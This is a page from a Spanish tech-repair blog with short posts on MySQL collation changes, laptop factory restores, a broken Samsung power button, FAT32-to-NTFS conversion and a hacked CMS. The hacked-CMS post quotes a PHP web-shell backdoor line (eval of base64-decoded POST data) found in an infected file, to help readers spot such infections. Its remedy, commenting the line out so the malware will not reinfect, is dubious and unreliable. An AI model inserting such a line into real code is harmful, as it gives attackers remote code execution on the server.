Modificar cotejamiento de todas las tablas a la vez utilizando SQL (MySQL)

07/09/14 | por admin | Categorías: Software, Programación

Al actualizar tanto comercios electrónicos creados con Prestashop o Oscommerce, como al actualizar blogs como Wordpress ó B2Evolution, etc .... me he encontrado el problema de pasar el cotejamiento de todas las tablas a utf8_spanish_ci.

Esto ha sucedido en gran parte por la llegada de HTML5 y muchos cambios que se han sucedido en los últimos años, dejando obsoletas algunas cosas que ya teniamos.

Encontré esta sentencia SQL para alterar el cotejamiento todas las tablas al mismo tiempo.

SELECT CONCAT('ALTER TABLE `', t.`TABLE_SCHEMA`, '`.`', t.`TABLE_NAME`, '` CONVERT TO CHARACTER SET utf8 COLLATE utf8_spanish_ci;') as stmt FROM `information_schema`.`TABLES` t WHERE 1 AND t.`TABLE_SCHEMA` = 'database_name' ORDER BY 1

Este proceso quita muchísimo trabajo, el no tener que ir cambiando una por una tabla de forma manual.

 

Error conexión money.service.msn.com

04/07/14 | por admin | Categorías: Redes, Windows, Vista, Windows 7

Al fallar la conexión a internet ha estado dando un error de conexión, una llamada a money.service.msn.com.

Investigando un poco, he descubierto que el Widget de escritorio de Convertidor de Moneda realiza llamadas a esta dirección para obtener los datos de los valores de moneda actuales. Al perder la conexión  a internet en mitad de una comunicación dá este error.

¡Sí!, tengo este widget en el escritorio, por este motivo estoy más tranquilo.

 

Portátil ASUS, restaurar el sistema a como venía de fábrica

01/06/14 | por admin | Categorías: Software, Windows, Windows 7

Tengo aquí un portátil con unos pocos virus (más de los que un Core i7 es capaz de superar).

En otras ocasiones los usuarios tienen mucha información en el equipo, que no quieren perder. Se tarda casi más tiempo en sacar toda la información que no quieren perder que en reinstalarle el sistema operativo.

Cuando esto no sucede, el mejor camino y más rápido es la restauración del sistema operativo a fábrica. Esto funciona porque traen una partición oculta con una imagen de la instalación del sistema operativo. Podemos usar esa partición en casi todas las marcas de portátiles y algunos sobremesas. Pero en cada marca se accede a dicha partición de restauración de una forma distinta.

El portátil que tengo aquí ahora para reparar es un ASUS A53S. Este portátil nada más encenderlo pulsamos la tecla F9 y arrancamos con Windows 7 EMS Configuración. Aparace la pantalla de inicio de Windows 7 pero en inglés.

Windows 7 Starting install Image

Después una vez iniciado, comienza el proceso de restauración, pidiéndonos el idioma (Spanish).

Tras pulsar siguiente en un mensaje de advertencia, nos pide seleccionar una opción entre: Recuperar windows sólo en la primera partición, Recuperar Windows en todo el disco duro, Recuperar Windows en todo el disco duro con dos particiones.

Los equipos modernos suelen venir con dos particiones, una para el sistema operativo, y otra para almacenar información que no queramos perder cuando queramos instalar o restaurar un sistema operativo, como en el caso que nos ocupa. Las dos últimas opciones borran absolutamente todos los datos del disco duro, la segunda creando una particion nada más para el sistema operativo, y la tercera opción creando dos particiones. En mi caso elegiré la primera opción: esta deja intacta la partición segunda donde se almacenan los datos y sólo restaura el sistema operativo en la primera partición.

Confirmamos las advertencias de que se perderá toda la información contenida en dicha partición y después de varios botones siguiente.... a esperar.

Suerte compañeros si estais en este mismo dilema, y recordad, casi todos los portátiles ASUS se accede a la partición de recuperación con la tecla de función F9 nada más pulsar el botón de encendido.

 

Virus Hack Blogs con Wordpress y B2Evolution

20/04/14 | por admin | Categorías: Software, Redes, Virus, Internet

Es muy importante tener las páginas webs CMS actualizadas a la última versión. Aún así, en muchas ocasiones se extiende más rápido los fallos de seguridad, los virus y los hackeos que las propias actualizaciones.

En la cabecera del blog aparecía un mensaje de error similar a este:

Undefined index: nd620ed in .../home/blogs/inc/_init_db.inc.php on line 1

Por lo que decidí investigar el fichero en cuestión: _init_db.inc.php de la carpeta /blogs/inc/

Como era en la línea número 1 del código donde identificaba el error, la ví y rápidamente la identifique como virus. Hará unos cinco meses me las ví con un virus similar en una página de un amigo en Wordpress y tuvimos que limpiarla. El virus provenía desde el propio servidor, por lo que, por mucho que volviamos a modificar el código de error; a los pocos minutos ya estaba de nuevo el fichero PHP modificado. Si proviene de tu propio servidor notificalo, pero es raro que asuman su responsabilidad; con suerte te diran que ellos no son pero lo miraran y eliminaran el virus de su servidor; con peor suerte ni te haran caso y te las veras y desearas... quizás teniendo como única solución a corto plazo cambiar de servidor o desactivar temporalmente la plataforma.

La primera línea de programación con código vírico que tenía el fichero _init_db.inc.php era esta:

eval(base64_decode($_POST['nd620ed']));?>

y casi siempre que veas el eval y el base64_decode... sospecha de un virus... sobre todo si son de las primeras líneas de código del fichero.

Yo la he comentado, porque los virus normalmente examinan el fichero y buscan si ya están incluido en el mismo, en caso afirmativo NO vuelven a escribir dicha cadena, para no causar repetición de líneas infinitas... eso mostraría muy a las claras una infección y dónde estaría.

Al estar comentada la línea, se encuentra y no volverá a intentar infectarlo. ;)

En caso de que no funciona modifica la línea comentara con disintos inventos como:

/* ******* Esto no es bueno ....

eval(base64 ....

... Con esto lo confundiras un poco .

*****/


 

Samsung N150 no enciende

02/01/14 | por admin | Categorías: Hardware, Portátil, Portatiles

Este portátil notebook Samsung tiene un fallo en el botón de encendido. El plástico es muy débil y termina rompiendose con el tiempo y el uso.

No es el único portátil con este tipo de problema, pero si se puede encontrar mucha gente con este portátil que ha tenido esta misma avería.

El modelo que he reparado ha sido el N150. El que aparece en la fotografía.

 

En la fotografía se puede apreciar el botón de encenedido, de tipo corredizo, en la parte derecha del portátil.

Para extraer el botón sin tener que desmontar el equipo, bastaría con hacer palanca por el lado libre con un objeto muy fino y resistente de metal o plástico. Yo opté por abrirlo, extrayendole la batería, los tornillos interiores, memoria ram...

En la siguiente fotografía se muestra el botón de plástico, una vez extraido, y marcado dónde se puede apreciar la rotura (no completa) del plástico. Es lo suficiente para que no consiga arrastrar el interruptor interior hacia la posición de encendido.

En la mayoría de portátiles con este tipo de avería son interruptores corredizos, y las piezas de plástico no suelen aguantar la presión y terminan cediendo/rompiéndose.

En la BIOS existe una opción para que el ordenador se encienda al abrir la tapadera del portátil, en unos portátiles funciona y en otros lo único que hace es despertar del modo suspensión. En este modelo, en teoría, debería encender el portátil y nos evitariamos con este método utilizar el botón roto para encender la computadora. Pero tras cambiar la opción en la configuración de la BIOS, el equipo seguía sin iniciar. Por este motivo hay que encender el portátil accionando el interruptor corredizo interior con un palillo o clip, deslizándolo hacia la derecha.

En la fotografía siguiente se puede apreciar un poco "borroso" el botón corredizo que tenemos que desplazar hacia la derecha.

 

Con esto conseguimos que se encienda nuestro Samsung N150, que parecía que estaba totalmente muerto.

Se puede intentar reparar el botón como se muestra en la siguiente fotografía:

Nota:

Aunque voy a crear un post explicando el método de como encender un portátil al abrir la tapa, modificando la BIOS; voy a anotarlo también aquí:

1º Pulsamos F2 para entrar en la BIOS.

2º Vamos  a Opciones Avanzadas (Advanced tab)

3º Cambiamos la opción "Lid Open S3 Wake-up" de Disabled a Enabled.

4º Pulsamos F10 para guardar los cambios y aceptamos.

 

 

starwindserviceAE.exe ¿virus o no?

13/12/13 | por admin | Categorías: 98

Me llamaron porque sospechaban que tenian un virus. Habían instalado varios programas de dudosos, y revisando los servicios encontré este:

starwindserviceAE

Como me resultó extraño, me dispuse a buscar por internet. Encontré en varios foros información de que era un virus, pero indagando la ubicación del archivo y leyendo un poco en la página de la compañía de software averigué que no era un virus, sino un servicio de la aplicación Alcohol.

A continuación detallo como entrar en servicios, buscar el servicio y el uso de dicho programa.

Servicio. Ejecutamos services.msc
starwindserviceAE.exe
No es un virus, es de la aplicación Alcohol para permitir grabar DVD a través de la red ethernet.

 

Nota: Al final resultó que estaban infectados con el virus Lollipop

 

Convertir particion Fat32 a NTFS desde consola

12/12/13 | por admin | Categorías: Software, Windows, XP, Vista, Windows 7

Me ha surgido la necesidad de realizar la consersión de una partición Fat32 a NTFS.
Windows trae una utilidad de consola para realizar la conversión. La aplicación gráfica es solo una piel para utilizar este programa.
Lo importante es no perder la información de la unidad, aunque nos advierte del peligro de que esto pueda suceder. Pero lo más prudente sería arrancar en modo prueba de fallos (modo seguro) en consola de comandos y entonces aplicar el siguiente comando.


%windir%\System32\convert.exe c: /fs:ntfs /nochkdsk

 

Páginas: 1 3 4 5 6 7 8 9 10 11 ... 22